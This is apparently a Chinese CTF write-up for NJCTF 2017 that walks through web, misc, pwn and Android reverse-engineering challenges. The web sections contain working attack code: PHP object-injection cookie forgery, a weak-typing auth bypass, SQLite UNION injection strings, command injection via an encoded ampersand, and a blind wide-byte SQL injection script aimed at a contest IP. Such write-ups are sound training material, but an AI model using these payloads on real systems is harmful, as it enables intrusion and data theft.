Ni9htMar3
Ni9htMar3

NJCTF writeup

WEB

Login

打开是一个注册与登陆界面,随便注册一个账号然后抓包,发现必须是admin账号才会给flag
这样利用长度截取
NJCTF writeup_第1张图片

用空格空出,超出注册用户名长度,然后后面跟一个1避免被函数消掉,这样我们就成功强行修改admin的密码为自己的密码
这里写图片描述

登陆即得flag

Get Flag

首先按照他所说的输入,会出现图片,并且格式是base64
NJCTF writeup_第2张图片

然后随便输入
NJCTF writeup_第3张图片

解密后发现执行的是cat命令
NJCTF writeup_第4张图片

这样只要构造命令,先查看目录,然后cat就行
发现&是可以绕过,直接%26编码然后一直执行ls命令查找
NJCTF writeup_第5张图片

发现目标

9iZM2qTEmq67SOdJp%!oJm2%M4!nhS_thi5_flag

cat即可
NJCTF writeup_第6张图片

Text wall

首先查找备份文件找到源码


$lists = [];
Class filelist{
    public function __toString()
    {
        return highlight_file('hiehiehie.txt', true).highlight_file($this->source, true);
    }
}
........
?>

通过抓包,将cookie解码一下,根据长度可知发现前面是sha1加密,后面是反序列化
NJCTF writeup_第7张图片

这是属于PHP Object Injection范围,利用反序列化得到并伪造cookie,构造相同的类型


    Class filelist{
        public function __toString()
        {
            return highlight_file('hiehiehie.txt', true).highlight_file($this->source, true);
        }
    }

    $a = new filelist();
    $a->source = 'index.php';
    $b= new filelist();
    $b->source=$a;
    $d=serialize($b);
    $e=sha1($d).$d;
    echo urlencode($e)."
";
?>

也可以用下面这种写法


    Class filelist{
        public function __toString()
        {
            return highlight_file('hiehiehie.txt', true).highlight_file($this->source, true);
        }
    }

    $a = [];
    $b= new filelist();
    $b->source = 'index.php';
    $a[]=$b;
    $d=serialize($a);
    $e=sha1($d).$d;
    echo urlencode($e)."
";
?>

得到index.php的内容

233333333333333333333333333333333333333333333333333333333333333333 
//The flag is /var/www/PnK76P1IDfY5KrwsJrh1pL3c6XJ3fj7E_fl4g
$lists = [];
Class filelist{
    public function __toString()
    {
        return highlight_file('hiehiehie.txt', true).highlight_file($this->source, true);
    }
}
if(isset($_COOKIE['lists'])){
    $cookie = $_COOKIE['lists'];
    $hash = substr($cookie, 0, 40);
    $sha1 = substr($cookie, 40);
    if(sha1($sha1) === $hash){
        $lists = unserialize($sha1);
    }
}
if(isset($_POST['hiehiehie'])){
    $info = $_POST['hiehiehie'];
    $lists[] = $info;
    $sha1 = serialize($lists);
    $hash = sha1($sha1);
    setcookie('lists', $hash.$sha1);
    header('Location: '.$_SERVER['REQUEST_URI']);
    exit;
}
?>

<html>
<head>
  <title>Please Get Flag!!title>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="stylesheet" href="http://apps.bdimg.com/libs/bootstrap/3.3.0/css/bootstrap.min.css">  
  <script src="http://apps.bdimg.com/libs/jquery/2.1.1/jquery.min.js">script>
  <script src="http://apps.bdimg.com/libs/bootstrap/3.3.0/js/bootstrap.min.js">script>
head>
<body>
<div class="container">
    <div class="jumbotron">
        <h1>Please Get Flag!!h1>
    div>
    <div class="row">
         foreach($lists as $info):?>
            <div class="col-sm-4">
              <h3>=$info?>h3>
            div>
         endforeach;?>
    div>
    <form method="post" href=".">
        <input name="hiehiehie" value="hiehiehie">
        <input type="submit" value="submit">
    form>
div>
body>
html>

flag文件已知,同样的构造方法即得flag

NJCTF{PHP_un5erialization_a77ack_i5_very_Interes71ng}

看别人的wp发现一道类似的题
https://losfuzzys.github.io/writeup/2016/10/02/tumctf-web50/

Wallet

由于提示是由源码的,所以疯狂找源码,因为是压缩包形式,用www.zip找到源码,密码是弱口令,猜测是njctf2017得到源码


require_once("db.php");
$auth = 0;
if (isset($_COOKIE["auth"])) {
    $auth = $_COOKIE["auth"];
    $hsh = $_COOKIE["hsh"];
    if ($auth == $hsh) {
        $auth = 0;
    } else if (sha1((string)$hsh) == md5((string)$auth)) {
        $auth = 1;
    } else {
        $auth = 0;
    }
} else {
    $auth = 0;
    $s = $auth;
    setcookie("auth", $s);
    setcookie("hsh", sha1((string)$s));
}
if ($auth) {
    if (isset($_GET['query'])) {
        $db = new SQLite3($SQL_DATABASE, SQLITE3_OPEN_READONLY);
        $qstr = SQLITE3::escapeString($_GET['query']);
        $query = "SELECT amount FROM my_wallets WHERE id=$qstr";
        $result = $db->querySingle($query);
        if (!$result === NULL) {
            echo "Error - invalid query";
        } else {
            echo "Wallet contains: $result";
        }
    } else {
        echo "Admin PageWelcome to the admin panel!

Wallet ID: 
";
    }
} else echo "Sorry, not authorized.";

是一个关于sha1((string)$hsh) == md5((string)$auth)的弱类型比较,直接爆破得到0e开头的即可
得到字符串
NJCTF writeup_第8张图片

然后就是一个简单的数字型的sqlite注入
NJCTF writeup_第9张图片

得到表名
NJCTF writeup_第10张图片

得到列名
NJCTF writeup_第11张图片

得到flag
NJCTF writeup_第12张图片

注:补充sqlite的注入方法

1 union select group_concat(tbl_name) from sqlite_master-- 暴表
1 union select sql from sqlite_master where tbl_name="XX" and type="table" -- 爆字段
1 union select group_concat(XXX) from XX--暴内容

Come On

这是一道注入题,随便输可知道过滤了or,and,union,<>
并且注释#需转码成%23
根据别人的提示是宽字节注入,测试一下

http://218.2.197.235:23733/index.php?key=1%df%27||1=1%23 http://218.2.197.235:23733/index.php?key=1%df%27||1=2%23

猜出表名字段名

1%df’ || exists(select(flag)from(flag))%23

上脚本

import requests
flag = ''
for i in range(1,33):
    for j in range(32,127):
        url = "http://218.2.197.235:23733/index.php?key=1%df' ||  if((select(right(left((select(flag)from(flag)),{}),1)))=binary({}),1,0)%23".format(str(i),str(bin(j)))
        s=requests.get(url=url)
        content=s.content
        length=len(content)
        #print length
        if length > 1000 :
            string+=chr(j)
            break
    print flag

NJCTF writeup_第13张图片

MISC

check QQ

直接在QQ群中找

knock

打开后发现了两串密文,第二个打开有点类似于莫尔斯密码,但没有间隔所以只能放弃,将第一个文本中的密文

zjqzhexjzmooqrssaidaiynlebnzjovosltahzjerhorrqxoeironlobdozavoouzjovosqfqsltahmqnqrrjotoerzjohorrqxoebooqydrztyqqojolx

尝试维吉尼亚后无果,然后放进quipquip网站直接解密,发现结果

that might be easy you could find the key from this message i used fence to keep the key away from bad ass here is the message in e e alcs tr laaeh e f g

正好与第二个密文间隔一致,然后可以发现后面是乱的,根据提示,将后面的栅栏一下得到结果
NJCTF writeup_第14张图片

加上NJCTF{}提交成功

easy_crypto

这题坑了我半天,解密代码很快都写出来了,就是因为key找错了,看了一下给的文件,发现
plain.txtcipher.txt字节数一样,这两个就是用来求key值的,然后用求出的key直接对flag.txt解密

#include 
#include 
#include 

int main()
{
    FILE* fp  = fopen("C:/Users/lanlan/Desktop/m2/plain.txt", "rb");
    FILE* fc  = fopen("C:/Users/lanlan/Desktop/m2/cipher.txt", "rb");
    FILE* ff  = fopen("C:/Users/lanlan/Desktop/m2/flag.txt", "rb");

    FILE* output_file = fopen("C:/Users/lanlan/Desktop/m2/F.txt", "wb");
    char a,b,f;
    char key[100];
    int i = 0,t = 0;

    while(((a = fgetc(fp)) != EOF))
    {
        b = fgetc(fc);
        key[i] = ((b - i*i - a + t) ^ t) & 0xff;
        t = a;
        i++;
    }
    char p, c = 0;
    i = 0;
    t = 0;
    while ((p = fgetc(ff)) != EOF)
    {
        c = ( p - i*i - (key[i % strlen(key)] ^ t) + t)&0xff;
        t = c;
        i++;
        fputc(c, output_file);
    }
    return 0;
}

flag:NJCTF{N0w_You90t_Th1sC4s3}

PWN

vsvs

nc过去,发现需要输入一个正确的数字,爆破吧,发现是22
NJCTF writeup_第15张图片

成功进入
发现不管输什么都是回显,尝试进行长度的爆破
NJCTF writeup_第16张图片

发现当我输入1500个1时有返回说文件名过长,且返回了有416长度,得知长度在1024个有漏洞
NJCTF writeup_第17张图片

没有回显啦,尝试执行命令
NJCTF writeup_第18张图片

得到flag文件夹,直接获取发现有问题,无法运行
NJCTF writeup_第19张图片

那尝试一下linux重定向
NJCTF writeup_第20张图片

Mobile by teammate

easycrack

  1. 首先安装apk,简单尝试,但是,安装时发现Android6.0版本的手机都因为SDK版本不够而无法安装,下载了Android7.0的模拟器:
    apk界面:
    NJCTF writeup_第21张图片

在进行输入时,上方会动态显示状态:
NJCTF writeup_第22张图片

同时可以查看DDMS,有日志输出:
NJCTF writeup_第23张图片

尝试到此
2. AndroidKiller以及JEB反编译:
NJCTF writeup_第24张图片

NJCTF writeup_第25张图片

主活动只有一个,Java代码量不大
但是解压缩后发现有so库
先分析Java代码:

public class MainActivity extends AppCompatActivity {
    class CheckText implements TextWatcher {
        CheckText(MainActivity this$0) {
            MainActivity.this = this$0;
            super();
        }

        public void afterTextChanged(Editable s) {
            MainActivity.this.findViewById(2131427416).setText("Status: " + MainActivity.this.parseText(
                    s.toString()));
        }

        public void beforeTextChanged(CharSequence s, int start, int count, int after) {
        }

        public void onTextChanged(CharSequence s, int start, int before, int count) {
        }
    }

    static {
        System.loadLibrary("native-lib");
    }

    public MainActivity() {
        super();
    }

    public String messageMe() {
        String v3 = "";
        int v4 = 51;
        String[] v1 = this.getApplicationContext().getPackageName().split("\\.");
        char[] v6 = v1[v1.length - 1].toCharArray();
        int v7 = v6.length;
        int v5;
        for(v5 = 0; v5 < v7; ++v5) {
            v4 ^= v6[v5];
            v3 += ((char)v4);
        }

        return v3;
    }

    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        this.setContentView(2130968603);
        this.findViewById(2131427416).setText(this.stringFromJNI());
        this.findViewById(2131427415).addTextChangedListener(new CheckText(this));
    }

    public native String parseText(String arg1) {
    }

    public native String stringFromJNI() {
    }
}

主要函数:
NJCTF writeup_第26张图片

这里是一个TextWatch,监听文本框的变化并进行状态显示,可以看到关键函数是:

public void afterTextChanged(Editable s) {
            MainActivity.this.findViewById(2131427416).setText("Status: " + MainActivity.this.parseText(s.toString()));
        }

对文本框的判断函数:

public native String parseText(String arg1) {

}

是Native,必须分析so文件

这里还要注意,初始化了一个字符串:
NJCTF writeup_第27张图片

开始还以为这就是输入
将程序改为Java代码直接得到结果:
NJCTF writeup_第28张图片

这里写图片描述

字符串:V7D=^,M.E

后面发现会用到

  1. 分析so文件:
    把so放入IDA反编译的时候,发现不同平台so文件反编译出的函数差别比较大,用
    这里写图片描述

反编译出的函数中,有分析字符串的函数parseText,另外几个so函数中没有找到,但肯定也有
这里写图片描述

NJCTF writeup_第29张图片

分析发现主要有以下关键点:
首先获取两个字符串:

  • str1
    NJCTF writeup_第30张图片

得到的即是前面算到的messageMe字符串:V7D=^,M.E

  • str2
    这里写图片描述

这个是输入的字符串

  1. 对输入字符串及V7D=^,M.E进行循环异或(即异或到第9位再返回V7D=^,M.E,继续异或),但是暂时不知道输入字符串的长度
    NJCTF writeup_第31张图片

  2. 从后往前看,想要输出success,要与compare比较通过
    NJCTF writeup_第32张图片

compare:
这里写图片描述

向前找v27:
NJCTF writeup_第33张图片

这里是将字符的十六进制形式转换为字符串,对比compare,可以知道加密后的最终字符串的十六进制格式:
0xC8,0xE4,0xEF,0x0E,0x4D,0xCC,0xA6,0x83,0x08,0x81,0x34,0xF8,0x63,0x5E,0x97,0x0E,0xEA,0xD9,0xE2,0x77,0xF3,0x14,0x86,0x9F,0x7E,0xF5,0x19,0x8A,0x2A,0xA4

  1. 继续向前分析,发现两个关键函数:
    NJCTF writeup_第34张图片

分别是初始化与加密
还要注意前面的I_am_the_key,为初始化时传入的字符串

7.init函数
NJCTF writeup_第35张图片

这个函数首先生成了一个长度为的字符串数组, 首先循环存储了I_am_the_key(这里开始不知道v6是怎么变化的,两种可能:一直为定值,由0~11循环,尝试以后发现是第二种情况)
生成后进行了位置交换,没有仔细研究规则。
编写函数得到初始化的结果:

#include
int main()
{
    int v3 = 256;
    int v4 = 0;
    int v5 = 0;
    int v6 = 0;//开始不知道v6如何变化 
    unsigned __int8 v11[14] = "I_am_the_key";
    unsigned __int8 v13[256];
    char *v7;
    unsigned __int8 *v8;
    int v9;
    char v14[256];
    do
    {
        v13[v5] = v5;
        v7 = v14;
        v14[v5++] = v11[v6];
        v6++;
        v6=v6%12;
    }
    while ( v5 != 256 );
    v8 = v13;
    do
    {
        v9 = *v8;
        v4 = (v9 + v4 + (unsigned __int8)*v7) % 256;
        *v8 = v13[v4];
        v13[v4] = v9;
        --v3;
        ++v7;
        ++v8;
    }
    while ( v3 );
    for(int i=0;i<256;i++)
    {
        printf("0x%x,",v13[i]);
    }
    return 0;
}

NJCTF writeup_第36张图片

  1. crypt函数
    NJCTF writeup_第37张图片

这个函数不是很复杂,得到的结果是最后的加密字符串,利用compare解密得到中间字符串:

#include
int main()
{
    int a3 = 30;
    int v3 = 0;
    int v4 = 0;
    int v5;
    int i = 0;
    unsigned __int8 a2[32] = {0xC8,0xE4,0xEF,0x0E,0x4D,0xCC,0xA6,0x83,0x08,0x81,0x34,0xF8,0x63,0x5E,0x97,0x0E,0xEA,0xD9,0xE2,0x77,0xF3,0x14,0x86,0x9F,0x7E,0xF5,0x19,0x8A,0x2A,0xA4};
    unsigned __int8 result[256] = {0x39,0xa9,0x72,0x2d,0xe8,0x58,0x26,0x32,0x81,0xd,0xac,0x49,0xbb,0x10,0x46,0x65,0xb3,0x92,0xf,0x84,0xb8,0xbf,0xf2,0x52,0xe3,0x5b,0xfc,0xd5,0x59,0x6a,0xf0,0x5d,0x60,0x69,0x16,0x8e,0xfb,0x94,0x48,0xbc,0x71,0x36,0x57,0xad,0x44,0x7c,0x95,0xda,0xb7,0x47,0xdb,0x35,0x3c,0xd2,0x23,0xc5,0xa8,0xb,0x9f,0x31,0xd8,0x1f,0x3f,0xb0,0x2e,0xe1,0x5a,0x4a,0xf9,0x1,0x54,0xa7,0xa5,0xee,0x8,0x99,0x63,0x9b,0x50,0xbd,0x5,0xf7,0xcb,0xab,0x22,0xc2,0x8a,0x38,0x7d,0x6,0xb1,0xc0,0x4e,0x74,0x3a,0xe5,0x67,0x2b,0xa3,0x73,0x89,0x9e,0xba,0x88,0x3d,0x28,0x62,0x8f,0xfd,0x43,0x98,0x4d,0x56,0xb2,0xc,0x29,0x6e,0x78,0x25,0xe0,0xe9,0xf6,0x9c,0x13,0xed,0xf8,0xc4,0x20,0x87,0x2,0x7b,0xf1,0x6d,0xc7,0x8c,0x9d,0x86,0x3b,0x66,0xfa,0xb6,0x42,0x6f,0x14,0xd0,0x19,0xaf,0x11,0x21,0x96,0x85,0x91,0xb5,0xa0,0x1b,0x18,0xa6,0xa2,0x4b,0x40,0xd4,0x8d,0x2a,0x8b,0x5c,0x2c,0xe6,0xfe,0xa4,0x30,0xe7,0xff,0xc8,0x5f,0xe2,0x1c,0xdf,0xae,0x7f,0xc3,0x61,0xef,0x90,0x6c,0x51,0x2f,0xec,0x12,0x7a,0xaa,0xdd,0x77,0xf5,0x4,0xd9,0x83,0x33,0xeb,0x80,0x27,0x3,0xb4,0x9,0x37,0x6b,0x41,0x4f,0x7e,0xf3,0x24,0xf4,0xc9,0x7,0xd1,0x45,0x70,0xa1,0xd7,0x34,0x93,0x15,0xca,0x4c,0xcd,0x97,0xb9,0xea,0x0,0x5e,0x1a,0x9a,0xcf,0x79,0xa,0x3e,0x82,0xd3,0x68,0x75,0x64,0xce,0x55,0xe,0xbe,0x1d,0xe4,0xc1,0xc6,0xde,0xcc,0x1e,0x17,0xd6,0xdc,0x53,0x76};
    do
    {
      v3 = (v3 + 1) % 256;
      v5 = *(unsigned __int8 *)(result + v3);
      v4 = (v5 + v4) % 256;
      *(unsigned __int8 *)(result + v3) = *(unsigned __int8 *)(result + v4);
      *(unsigned __int8 *)(result + v4) = v5;
      a2[i] ^= *(unsigned __int8 *)(result + ((*(unsigned __int8 *)(result + v3) + v5) & 0xFF));
      --a3;
      ++i;
    }
    while ( a3 );
    for(i=0;i<30;i++)
    {
        printf("0x%x,",a2[i]);
    }


    return 0;
}

结果:
这里写图片描述
此即是开始循环异或后的字符串

  1. 去除循环异或
#include
int main()
{
    int v10 = 30;
    int v11 = 9;
    int v12;
    int v27 = 0;
    int v13;

    unsigned __int8 v25[30];
    unsigned __int8 v24[32] = {0x1f,0x43,0x1b,0x4e,0x1,0x4d,0x12,0x4b,0x24,0x25,0x4e,0x7,0x4f,0x3f,0x4f,0x26,0x71,0x23,0x39,0x45,0x1b,0x5f,0x3b,0x4b,0x24,0x40,0x2b,0x33,0x45,0x37};
    char s[11]= "V7D=^,M.E";
    if ( v10 )
    {
      do
      {
        if ( v11 )
        {
          v12 = 0;
          do
          {
            *(&v25[v27] + v12) = s[v12] ^ *(&v24[v27] + v12);
            v13 = v27 + v12++ + 1;
          }
          while ( v12 < v11 && v13 < v10 );
        }
        v27 += v11;
      }
      while ( v27 < v10 );

    }
    for(int i=0;i<30;i++)
    {
        printf("%c",v25[i]);
    }          
    return 0;
}

结果:
NJCTF writeup_第38张图片

flag:It_s_a_easyCrack_for_beginners

safeBox

tips:Don't believe what you saw.
The flag's format is NJCTF{xxx} and xxx only include [a-z][A-Z][0-9].
解压apk发现没有so文件
直接放入JEB:
1. 代码并不复杂,开始直接看了MainActivity:
NJCTF writeup_第39张图片
发现是一个8位回文数,并且限制比较具体,得到48533584,得到结果:
NJCTF{05#f4n}明显不符合题目要求,虽然在手机上安装测试成功了,但是,提交提示错误。
2. 这才注意到另一个类androidTest
非常像,但细节不同:
NJCTF writeup_第40张图片

这个不限制中间两位必须相等,而且后面有+10,此时得到4853958448533584,按新规则得到结果NJCTF{have05if4n}(此时用的是48539584),提交正确。
这才想到题目的提示, 不要相信看到的
flag:NJCTF{have05if4n}

LittleRotatorGame

tips:keep the screen green and rotate, you will get the flag.
The flag's format is njctf{xxx} and xxx only include [a-z][A-Z][0-9].

这是一个完全由C语言编写的APP,或者叫Native Android

据说要去除控制流平坦化导致的混淆,据说爆破flg函数可以得到答案:
NJCTF writeup_第41张图片

NJCTF writeup_第42张图片

是不是可以用符号化执行工具angr,还不会这个题。

flag:PvrNa7iv3Al1

你可能感兴趣的:(WriteUp)

  • vulnhub靶机-DC2-Writeup 含日 靶机linux安全靶机渗透测试安全漏洞
    0x01部署靶机地址:https://www.vulnhub.com/entry/dc-2,311/DESCRIPTIONMuchlikeDC-1,DC-2isanotherpurposelybuiltvulnerablelabforthepurposeofgainingexperienceintheworldofpenetrationtesting.AswiththeoriginalDC-1,i
  • ctf-杂项-编码分析-Morse编码 go_to_hacker ctfctf
    通信中的编码:Morse编码,(国际摩尔斯电码)ctf:题目:嘀嗒嘀嗒嘀嗒嘀嗒时针它不停在转动-----.-.....嘀嗒嘀嗒嘀嗒嘀嗒小雨它拍打着水花-.-.----...writeup:通过摩斯密码表自己一一对应查找,也可以同网上在线工具直接计算http://www.zhongguosou.com/zonghe/moErSiCodeConverter.aspx或者:http://rumkin.c
  • 【web安全】从2022中科大hackgame web中学习pdflatex RCE和python反序列化 热心网友易小姐 pythonweb安全前端
    ctf比赛地址:https://hack.lug.ustc.edu.cn大佬博客里wp写的很清楚了,官方wp也写的很好,我比不过大佬,只能把基础多讲一些(大佬在tttang把wp全发了T0T)官方wp:https://github.com/USTC-Hackergame/hackergame2022-writeups大佬全WP:https://miaotony.xyz/?utm_source=tt
  • 2018-10-08-Vulnhub渗透测试实战writeup(5) 最初的美好_kai
    老规矩,直接上nmapnmap-p--A-sV-Pn10.10.10.145结果如下:StartingNmap7.01(https://nmap.org)at2018-10-0816:50CSTNmapscanreportfor10.10.10.145Hostisup(0.0082slatency).Notshown:65532closedportsPORTSTATESERVICEVERSION8
  • 实验吧CTF密码学Writeup-古典密码Writeup syxvip
    古典密码分值:10来源:北邮天枢战队难度:易参与人数:6803人GetFlag:2507人答题人数:2791人解题通过率:90%密文内容如下{796785123677084697688798589686967847871657279728278707369787712573798465}请对其进行解密提示:1.加解密方法就在谜面中2.利用key值的固定结构格式:CTF{}密文全是数字,ascll码
  • 《SQLi-Labs》05. Less 29~37 永别了,赛艾斯滴恩 lessandroid前端
    title:《SQLi-Labs》05.Less29~37date:2024-01-1722:49:10updated:2024-02-1218:09:10categories:WriteUp:Security-Labexcerpt:HTTP参数污染,联合注入、宽字节注入。comments:falsetags:top_image:/images/backimg/SunsetClimbing.png
  • 日志题writeup hades2019
    1、既然是日志分析,首先打开日志,access.log,摘取片段:id=1%27%20aNd%20%28SelECT%204235%20fRom%20%28SelECT%28sleEp%281-%28If%28ORd%28MId%28%28SelECT%20IfNULL%28CaST%28%60flag%60%20aS%20nChar%29%2C0x20%29%20fRom%20sqli.%60f
  • cakectf-2021-hwdbg - “/dev/mem“ goodcat666 pwn_cve_kernellinuxpwn
    出题意图是了解"/dev/mem"这里是/dev/mem详解文档题目给出了特权进程/bin/hwdbg修改/dev/mem进行提权/$ls-lah/bin/hwdbg-r-sr-xr-x1rootroot25.6KAug2803:18/bin/hwdbg下面有两种方式进行提权修改内核数据进行提权https://github.com/u1f383/writeup/blob/main/CakeCTF_
  • CTFHub-Web-密码口令 WriteUp 曾小健_0532
    一、弱口令  1.题目内容  2.解题思路  使用burpsuite进行字典爆破  3.解题过程  首先抓包  使用intruder模块进行爆破  得到正确的口令,CaptureTheFlag!二、默认口令  1.题目内容  2.解题思路  网上查找该产品的默认用户名和密码  3.解题过程  查询到默认用户名为eyougw,密码为admin@(eyou),成功登陆后,CaptureTheFlag!
  • N1CTF Junior 2024 Web Official Writeup(Nu1L Team组织的官方纳新赛事,旨在选拔优秀人才加入Nu1L Team,可是小北是大二生,抱着玩玩的心态来的) Stitch . CTF我的大学笔记Web前端androidwebweb安全CTFN1CTF
    Nu1L-CTF大本营-网络安全竞赛平台-i春秋(ichunqiu.com)https://www.ichunqiu.com/competition/team/15赛事举办方信息Nu1LTeam组织的官方纳新赛事,旨在选拔优秀人才加入Nu1LTeam作为国内TOPCTF战队,Nu1LTeam自2015年10月成立以来,斩获了国内外众多赛事冠军以及闯入DEFCONCTF总决赛,这得益于Nu1L每一位
  • ISCTF-Reverse-WriteUP shangwenDD 赛后题解网络安全算法安全c++pythonc语言
    crakme[Shangwendada,wakappxcdone]法1其实应该本来想考的是upx壳,但是似乎出题人没想到可以直接运行的问题…法2首先查壳脱壳发现脱不了放入010Editor查看并改特征码载入ida里面验证flag正确mfx_re[Shangwendadadone]这玩意瞅着真熟悉UPX老哥,改了特征码修复文件file_path='mfx_re'#替换成你的二进制文件路径withop
  • HCTF2017-Web-Writeup dengzhasong7076 php数据库python
    boringwebsite先通过扫描得到:http://106.15.53.124:38324/www.zip";echo"flagishctf{whatyouget}";error_reporting(E_ALL^E_NOTICE^E_WARNING);try{$conn=newPDO("sqlsrv:Server=*****;Database=not_here","oob","");}catc
  • IMF_1(VulbHub)_WriteUp 沫风港 综合渗透_靶场通关文档网络安全
    目录1、主机探测2、web渗透发现flag1发现flag2拼接imfadministrator目录收集用户名代码审计之弱类型绕过发现flag3进入IMFCMS漏扫测试尝试跑sqlmap发现异常数据发现flag4继续访问uploadr942.php页面waf绕过(.htaccess绕过)发现flag5反弹shell3、内网渗透查找agent查看开启的端口情况查看/usr/local/bin下的文件敲
  • CewlKid(VulnHub)_Writeup 沫风港 综合渗透_靶场通关文档网络安全
    CewlKid(VulnHub)文章目录CewlKid(VulnHub)1、前期信息收集nmap扫描①存活主机②端口扫描、操作系统③漏洞探测④tcp、udp扫描gobuster目录爆破dirb目录爆破2、Web渗透部分思路一:SitemagicCMS漏洞库查询思路二:常规web渗透手法①信息收集②密码爆破,尝试进后台③上传webshell④拿下普通权限终端3、内网渗透部分检查ip发现拿到的shel
  • AUSTCTF2023 WriteUp 乔不思- python网络安全
    Basicbasic1C语言基础,没啥好说的。。basic22022蓝桥杯真题,其实搜一下答案就出来了#includeconstintN=2022,k=10;longlongpd[N+1][k+1]{1};intmain(){for(inti=1;i=j)pd[i][j]=pd[i-j][j]+pd[i-j][j-1];printf("%lld",pd[N][k]);}basic3右键查看网页源代
  • Defcon 2018 Qualify: Easy Pisy writeup 可爱多多白 非专业知识积累安全漏洞密码学区块链
    文章目录Defcon2018Qualify:EasyPisy1.SourceCode2.Writeup3.Info4.AnalysisofAuthor4.1janmasarik4.2nneonneo(RobertXiao)4.3MarcStevens4.4ElieBursztein(Google)5.语言中的签名函数5.1php5.1.1[standardslibrary](https://www
  • PICTURE writeup By K龙 Kayden_龙邵仁
    PICTUREFromCISCN-2018-QualsMISC杂项下载附件,得到一图片图片用winhex打开,发现zlib文件头用binwalk把文件分离,得到一个加密压缩文件及一个文本文件将文件转化为十六进制,发现文件具有ascii编码特征用kali解码后,文件具有base64加密特征,二次解码后把文件转化为zip文件压缩文件打开后,文件破损,附有压缩文件密码提示这个位置的提示前期以为是需要用p
  • 第六届“强网杯”全国网络安全挑战赛-青少年专项赛 学不会pwn不改名 web安全安全
    选拔赛可以看WP|第六届强网杯青少赛线上赛WriteUp_青少年ctf的博客-CSDN博客科普赛-网络安全知识问答一、单项选择题1、以太网交换机实质上是一个多端口的()。A、网桥B、路由器C、中继器D、集线器您的答案:A标准答案:A2、()是传统密码学的理论基础。A、计算机科学B、物理学C、量子力学D、数学您的答案:D标准答案:D3、IP服务的主要特点是()。A、不可靠、面向无连接和尽最大努力投递
  • XCTF:warmup[WriteUP] 0DayHP 网络安全
    Ctrl+U查看页面源码Document发现注释处的source.php,复制到地址栏进入获取新的一堆php代码"source.php","hint"=>"hint.php"];if(!isset($page)||!is_string($page)){echo"youcan'tseeit";returnfalse;}if(in_array($page,$whitelist)){returntrue
  • NSSCTF Round17 Reverse & Crypto WriteUp(全) Tanggerr 安全CTFNSSCTF
    NSSCTFRound17Reverse&CryptoWriteUp(全)Reverse一.snakego1.19写的,直接找到main函数,下断点动调以下为输入函数(输入wasd):for(i=0LL;i\nv01dbnssst(intFTC[],intlenggggggg){\ninti,j,SSN;\n')print('ThisisCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
  • XCTF:Normal_RSA[WriteUP] 0DayHP 网络安全
    从题目中获取到两个文件flag.enc内容是通过rsa加密了的密文pubkey.pem是rsa公钥,加密者利用这个文件对flag原文进行了加密如果对rsa加密算法不了解的可以补一下教学视频数学不好也能听懂的算法-RSA加密和解密原理和过程_哔哩哔哩_bilibili使用openssl对公钥文件算出N、E的值opensslrsa-pubin-text-modulus-inpubkey.pemE=65
  • 2022巅峰极客WriteUp By EDISEC EDI安全 CTF-Writeupweb安全安全网络安全
    2022巅峰极客WriteUpByEDISECWebbabywebezWebCryptopoint-powerstrangecurvePwnGiftsmallcontainerhappy_note决赛开端:strangeTempreturenodesystemgcdbabyProtocol招新Webbabyweb提示Paddingoracle直接随便在⽹上找个脚本搓了半天没什么反应,后来直接⽤pa
  • 第一届“龙信杯”电子数据取证竞赛Writeup 是toto python网络安全数据分析开发语言php
    个人思路仅供参考~有问题可以联系我或者评论文章目录移动终端取证1.请分析涉案手机的设备标识是_______。(标准格式:12345678)2.请确认嫌疑人首次安装目标APP的安装时间是______。(标准格式:2023-09-13.11:32:23)3.此检材共连接过______个WiFi。(标准格式:1)4.嫌疑人手机短信记录中未读的短信共有______条。(标准格式:12)5.嫌疑人检材手机在
  • 2024獬豸杯完整Writeup 是toto mysqlforensic电子取证网络安全数据分析
    文章目录手机手机基本信息-1、IOS手机备份包是什么时候开始备份的。(标准格式:2024-01-20.12:12:12)手机基本信息-2、请分析,该手机共下载了几款即时通讯工具。(标准格式:阿拉伯数字)手机基本信息-3、手机机主的号码得ICCID是多少。(标准格式:阿拉伯数字)手机基本信息-4、手机机主登录小西米语音的日期是什么时候。(标准格式:20240120)地图数据-1、请问嫌疑人家庭住址在
  • CTF新生赛之Writeup sh1kaku_ CTF密码学phpweb
    CTF新生赛之Writeup作为零基础的新生,也是在开学后才了解了CTF,感觉本次新生赛中颇有收获,也是应赛制要求,故写下这份WP,以纪念本人的第一次CTF竞赛。回顾和感想回顾本次的新生赛,难度合适,自己从对CTF一无所知到入门再到学习相关知识,确实有很大的进步;从做题的过程中来看,期间有欣喜也有挫败:欣喜的是通过自己的努力将一道初看起来没思路的题慢慢解答出来,在提交flag的那一刻确实很激动;但
  • 第十届南京邮电大学网络攻防大赛(NCTF 2021)writeup 渗透测试中心 CTF网络javaspringboot开发语言后端
    WebX1cT34m_API_SystemAuthor:wh1sper题目描述:在API安全的新时代,安全圈迎来风云变幻。掀起巨浪的你?只手遮天的你?选择保护还是放弃你的曾经的伙伴?target:http://129.211.173.64:58082/附件链接:https://wwn.lanzoui.com/iUoDwwyfdxchint1:thehiddenAPItobypass403hint2
  • NahamCon CTF 2022 pwn 部分writeup z1r0. buuctf题目pwn
    NahamConCTF2022pwn部分writeupBabierstepsret2textfrompwnimport*context(arch='amd64',os='linux',log_level='debug')file_name='./z1r0'li=lambdax:print('\x1b[01;38;5;214m'+x+'\x1b[0m')ll=lambdax:print('\x1b[
  • 2023年春秋杯网络安全联赛冬季赛 Writeup 末 初 GameWriteups2023春秋杯春秋杯冬季赛
    文章目录Webezezez_phppicupMisc谁偷吃了外卖modules明文混淆PwnnmanagerbookReupx2023CryptoCFisCryptoFaker挑战题勒索流量Ezdede可信计算Webezezez_php反序列化打redis主从复制RCE:https://www.cnblogs.com/xiaozi/p/13089906.html";}publicfunction_
  • 攻防世界——answer_to_everything-writeup _Nickname everythingpythonjava
    __int64__fastcallnot_the_flag(inta1){if(a1==42)puts("CipherfromBill\nSubmitwithoutanytags\n#kdudpeh");elseputs("YOUSUCK");return0LL;}kdudpeh这个东西,根据题目提示sha1加密importhashlibflag='kdudpeh'x=hashlib.sha1(f
  • HTB Napper WriteUp Som3B0dy HackTheBox网络安全
    Napper2023年11月12日14:58:35UserNmap➜Nappernmap-sCV-A-p-10.10.11.240--min-rate10000StartingNmap
  • scala的option和some 矮蛋蛋 编程scala
